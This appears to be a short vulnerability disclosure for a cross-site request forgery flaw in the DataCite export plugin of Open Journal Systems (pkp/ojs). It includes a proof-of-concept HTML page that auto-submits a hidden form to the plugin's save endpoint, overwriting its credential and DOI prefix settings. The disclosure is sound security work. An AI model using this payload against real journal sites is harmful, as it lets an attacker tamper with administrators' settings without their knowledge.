Cross-Site Request Forgery (CSRF) in pkp/ojs

Valid

Reported on

Oct 16th 2021

Description

No CSRF token in DataCite save settings plugin (OJS only)

POC

<html>                                                                                                             
  <body>                                                                                                           
        <form action="http://10.0.2.15:8000/index.php/e/$$$call$$$/grid/settings/plugins/settings-plugin-grid/manage?plugin=DataciteExportPlugin&category=importexport&verb=save" method="POST"> 
           <input type="hidden" name="username" value="" />
           <input type="hidden" name="password" value="" />
           <input type="hidden" name="testUsername" value="" />
           <input type="hidden" name="testPassword" value="" />
           <input type="hidden" name="testDOIPrefix" value="" />
           <input type="hidden" name="submitFormButton" value="" />
        </form>
        <script>
        document.forms[0].submit();
        </script>
  </body>
</html> 
````
# Impact
This vulnerability is capable of tricking admins to change settings for OJS DataCite plugin